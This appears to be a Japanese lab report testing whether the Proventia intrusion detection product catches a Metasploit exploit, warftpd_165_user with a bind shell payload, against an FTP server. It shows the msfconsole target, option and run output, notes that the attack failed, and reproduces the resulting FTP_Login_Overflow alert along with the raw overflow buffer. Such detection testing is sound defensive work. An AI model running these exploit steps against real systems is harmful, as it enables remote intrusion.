【Exploit】warftpd_165_user

■攻撃元

192.168.221.11 W2K

■攻撃対象

192.168.221.180 Win2K+Engish & WinXP+Japanes



■影響

以下の実証コードでは、攻撃が失敗し、対象ホストのPort4444はオープンしませんでした。



■実証コード

msf warftpd_165_user(win32_bind) > show targets

Supported Exploit Targets
=========================

0 Windows 2000 SP0-SP4 English
1 Windows XP SP0-SP1 English
2 Windows XP SP2 English

msf warftpd_165_user(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ --------------- ------------------
optional SSL Use SSL
required RHOST 192.168.221.180 The target address
required RPORT 21 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC process Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP0-SP4 English
msf warftpd_165_user(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Trying Windows 2000 SP0-SP4 English using return address 0x750231e2....
[*] 220 test-7nz5l7tfed Microsoft FTP Service (Version 5.0).
[*] Sending evil buffer....
[*] Exiting Bind Handler.


■Provenitaでの検知結果

Event Number : 1
Date/Time : 2006-01-15 12:17:52 JST
Tag Name : FTP_Login_Overflow
Alert Name : FTP_Login_Overflow
Severity : High
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 1
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.37.180
Target Object Name : 21
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 2123
Sensor DNS Name :
Sensor IP Address : 192.168.221.11
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :cmd
Attribute Value : USER
Attribute Name : :Coalescer_Info
Attribute Value : Update Pending
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 2123
Attribute Name : :length
Attribute Value : 1112
Attribute Name : :pam.login.maxname
Attribute Value : 100
Attribute Name : :user
Attribute Value : ・・・OJ・??/妁K汾剴檳劔OA・NCB汨AGNO・適A羨炉/77泱N?CO・Gw_.qィ澤_サMムUスuゞスJム・w-ン鰉モ・u錞澑晶・タ謂VV.マ閊4?.ノヤ
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.37.180
Attribute Name : :victim-port
Attribute Value : 21
Attribute Name : algorithm-id
Attribute Value : 2001306
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.37.180
Attribute Name : Packet DestinationPort
Attribute Value : 21
Attribute Name : Packet DestinationPortName
Attribute Value : ftp
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet SourcePort
Attribute Value : 2123